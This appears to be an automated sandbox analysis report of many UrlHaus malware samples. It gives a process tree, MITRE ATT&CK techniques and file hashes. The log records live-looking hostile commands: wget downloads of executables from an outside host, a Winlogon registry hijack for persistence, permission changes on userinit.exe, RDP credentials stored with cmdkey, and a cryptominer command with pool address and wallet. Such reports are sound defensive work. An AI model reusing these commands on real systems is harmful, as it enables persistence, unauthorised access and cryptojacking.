C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1856 /prefetch:26⤵PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2372 /prefetch:26⤵PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2360 /prefetch:26⤵PID:804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3980 /prefetch:26⤵PID:3036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4032 /prefetch:26⤵PID:4788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:16⤵
- Uses browser remote debugging
PID:4396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1844,12795968660861847543,218532269668770386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:16⤵
- Uses browser remote debugging
PID:4900
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JJJJDAAECGHD" & exit5⤵
- System Location Discovery: System Language Discovery
PID:5952 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6008
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"4⤵
- Executes dropped EXE
PID:3056
-
-
C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1704
-
-
C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1208
-
-
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:392
-
-
C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"C:\Users\Admin\Downloads\UrlHausFiles\unik.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 15005⤵
- Program crash
PID:5268
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"5⤵PID:2292
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"4⤵
- Executes dropped EXE
PID:5736
-
-
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"4⤵
- Executes dropped EXE
PID:5388
-
-
C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe"C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5588
-
-
C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5816 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5816 -s 5685⤵
- Program crash
PID:6016
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\build.exe"C:\Users\Admin\Downloads\UrlHausFiles\build.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\Downloads\UrlHausFiles\build.exe" & rd /s /q "C:\ProgramData\KFHJJJKKFHID" & exit5⤵
- System Location Discovery: System Language Discovery
PID:3520 -
C:\Windows\SysWOW64\timeout.exetimeout /t 106⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5124
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"C:\Users\Admin\Downloads\UrlHausFiles\shell.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5824
-
-
C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2960 -
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30006⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5224
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3704 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D6B.tmp\6D6C.tmp\6D6D.bat C:\Users\Admin\Downloads\UrlHausFiles\ITplan.exe"5⤵PID:2832
-
C:\Windows\system32\cmdkey.execmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"6⤵PID:4240
-
-
C:\Windows\system32\mstsc.exemstsc /v: 211.168.94.1776⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3192
-
-
C:\Windows\system32\cmdkey.execmdkey /delete: 211.168.94.1776⤵PID:5128
-
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
PID:4808
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"4⤵
- Executes dropped EXE
PID:5264 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7153.tmp\7154.tmp\7155.bat C:\Users\Admin\Downloads\UrlHausFiles\boot.exe"5⤵PID:5400
-
C:\Windows\explorer.exeexplorer.exe6⤵
- Modifies registry class
PID:3544
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"6⤵
- Executes dropped EXE
PID:5752
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"6⤵
- Executes dropped EXE
PID:3616
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"6⤵
- Executes dropped EXE
PID:3168
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"6⤵
- Executes dropped EXE
PID:2388
-
-
C:\Users\Admin\AppData\Roaming\run.exerun.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5924 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D26E.tmp\D26F.tmp\D270.bat C:\Users\Admin\AppData\Roaming\run.exe"7⤵PID:5232
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2372
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5572
-
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:4704
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"8⤵
- Views/modifies file attributes
PID:5680
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"8⤵
- Views/modifies file attributes
PID:2472
-
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5852
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F8⤵PID:5488
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F8⤵PID:1452
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F8⤵PID:5728
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "Fix Getting Devices" /F8⤵PID:5556
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "Windows Optimize" /F8⤵PID:340
-
-
C:\Windows\system32\schtasks.exeSchTasks /Delete /TN "ChangeWallpaper" /F8⤵PID:2356
-
-
-
-
C:\Users\Admin\AppData\Roaming\run2.exerun2.exe6⤵
- Executes dropped EXE
PID:6076 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D608.tmp\D609.tmp\D60A.bat C:\Users\Admin\AppData\Roaming\run2.exe"7⤵
- Drops file in System32 directory
PID:5084 -
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/wallx.exe" -O "wallx.exe"8⤵
- Executes dropped EXE
PID:5916
-
-
C:\Users\Admin\AppData\Roaming\wallx.exewallx.exe8⤵
- Executes dropped EXE
PID:1092 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE62.tmp\EE63.tmp\EE64.bat C:\Users\Admin\AppData\Roaming\wallx.exe"9⤵PID:2668
-
C:\Users\Admin\AppData\Roaming\WallpaperX.exeWallpaperX.exe10⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
PID:4708
-
-
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/boot.exe" -O "boot.exe"8⤵
- Executes dropped EXE
PID:236
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/FixCSM.exe" -O "FixCSM.exe"8⤵
- Executes dropped EXE
PID:564
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/del.exe" -O "C:\Windows\System32\del.exe"8⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5660
-
-
C:\Users\Admin\AppData\Roaming\wget.exewget -q "http://quanlyphongnet.com/net/Coc Coc XG.exe" -O "Coc Coc XG.exe"8⤵
- Executes dropped EXE
PID:4712
-
-
C:\Windows\system32\takeown.exetakeown /F "C:\windows\system32\userinit.exe"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\system32\icacls.exeicacls "C:\windows\system32\userinit.exe" /grant administrators:F8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4512
-
-
C:\FixCSM.exeC:\FixCSM.exe8⤵
- Executes dropped EXE
PID:5676 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4ABB.tmp\4ACC.tmp\4ACD.bat C:\FixCSM.exe"9⤵PID:5904
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\boot.exe,C:\Program Files (x86)\CSMClient\CyberStation.exe," /f10⤵
- Modifies WinLogon for persistence
PID:2976
-
-
-
-
C:\Windows\system32\timeout.exeTIMEOUT /T 108⤵
- Delays execution with timeout.exe
PID:5432
-
-
C:\Windows\System32\del.exeC:\Windows\System32\del.exe8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6104 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F5A.tmp\6F5B.tmp\6F5C.bat C:\Windows\System32\del.exe"9⤵PID:5624
-
C:\Windows\system32\timeout.exeTIMEOUT /T 510⤵
- Delays execution with timeout.exe
PID:5944
-
-
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Administrator\AppData\Roaming\config.txt"8⤵
- Views/modifies file attributes
PID:1880
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Administrator\AppData\Roaming\log.txt"8⤵
- Views/modifies file attributes
PID:2292
-
-
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"C:\Users\Admin\Downloads\UrlHausFiles\InstallSetup.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5780
-
-
C:\Users\Admin\Downloads\UrlHausFiles\me.exe"C:\Users\Admin\Downloads\UrlHausFiles\me.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Desktop\..\360Downloads\Pester.bat5⤵
- System Location Discovery: System Language Discovery
PID:5336 -
C:\Windows\SysWOW64\PING.EXEping -n 4 127.0.0.16⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1748
-
-
-
-
C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5888
-
-
C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"C:\Users\Admin\Downloads\UrlHausFiles\wow.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5864
-
-
C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:5496
-
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\UrlHausFiles\urlhaus_urls.txt2⤵
- Opens file in notepad (likely ransom note)
PID:3544
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4184 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=503⤵
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /02⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5392
-
-
C:\Users\Admin\Desktop\Coc Coc.exe"C:\Users\Admin\Desktop\Coc Coc.exe"2⤵
- Executes dropped EXE
PID:4440 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E45.tmp\4E46.tmp\4E47.bat "C:\Users\Admin\Desktop\Coc Coc.exe""3⤵
- Drops file in Program Files directory
PID:1708 -
C:\Users\Admin\AppData\Roaming\portable_util.exeportable_util.exe --register-coccoc-portable --force-uid=3849d47c-687c-49be-b315-4e062899d124 --skip-import --skip-welcome --do-not-create-shortcut --force-regenerate-hid4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3516 -
C:\Users\Admin\AppData\Roaming\setup.exe"C:\Users\Admin\AppData\Roaming\setup.exe" --register-coccoc-portable --do-not-create-shortcut5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4476 -
C:\Users\Admin\AppData\Roaming\setup.exeC:\Users\Admin\AppData\Roaming\setup.exe --type=crashpad-handler /prefetch:7 --no-upload-gzip --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\CocCoc\Browser\User Data\Crashpad" --url=https://browser-crashes.coccoc.com/cr/report --annotation=channel= --annotation=plat=Win32 "--annotation=prod=Coc Coc" --annotation=ver=114.0.5735.210 --initial-client-data=0x334,0x338,0x33c,0x314,0x340,0x7c8088,0x7c8098,0x7c80a46⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5568
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4912 -ip 49121⤵PID:3132
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4744
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1736
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5816 -ip 58161⤵PID:5920
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3048
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4936 -ip 49361⤵PID:3544
-
C:\Windows\System32\GameBarPresenceWriter.exe"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer1⤵
- Network Service Discovery
PID:5264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Checks processor information in registry
- Modifies registry class
PID:5112
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Modify Authentication Process
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Authentication Process
1Modify Registry
3Obfuscated Files or Information
1Command Obfuscation
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Discovery
Browser Information Discovery
1Network Service Discovery
1Peripheral Device Discovery
2Query Registry
9Remote System Discovery
1System Information Discovery
6System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
119KB
MD5c70ed186b656df4ad5b512bda26f6933
SHA1db8d501252832adafd083fc0f3e308df33669482
SHA2568108c2efbf923e9fb7c8b8e1634c17e1f91e1ef277791845135f3452a48d09bc
SHA5121f335ce05a696062bf82154ece2726eda3bbc99f0b69f19fe210d735dc33c137844be1e302d404a389aaff0d08f7eaa229301ba811af0489932d0b5171f624c5
-
Filesize
649B
MD5d469d0fcbf8785db71f05515235821a3
SHA1d89549eae599cbfd8df21a6332ce1a255a61574b
SHA25647fef9c1b8aa70b06698895732ab9831df750f79c2041a9b4007cc1eb313ceb0
SHA512f2f578fda08fc2509e2376df853138dd9e50fb6816442639d739e3912a492dd6385013fa9747c10f25f797d1eb59376b599f4c2dfa31de6ad78d7965407ab318
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
152B
MD5051a939f60dced99602add88b5b71f58
SHA1a71acd61be911ff6ff7e5a9e5965597c8c7c0765
SHA2562cff121889a0a77f49cdc4564bdd1320cf588c9dcd36012dbc3669cf73015d10
SHA512a9c72ed43b895089a9e036aba6da96213fedd2f05f0a69ae8d1fa07851ac8263e58af86c7103ce4b4f9cfe92f9c9d0a46085c066a54ce825ef53505fdb988d1f
-
Filesize
152B
MD5003b92b33b2eb97e6c1a0929121829b8
SHA16f18e96c7a2e07fb5a80acb3c9916748fd48827a
SHA2568001f251d5932a62bfe17b0ba3686ce255ecf9adb95a06ecb954faa096be3e54
SHA51218005c6c07475e6dd1ec310fe511353381cf0f15d086cf20dc6ed8825c872944185c767f80306e56fec9380804933aa37a8f12c720398b4b3b42cb216b41cf77
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\016f48de-7b0f-4008-a968-78b3813b38e1.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
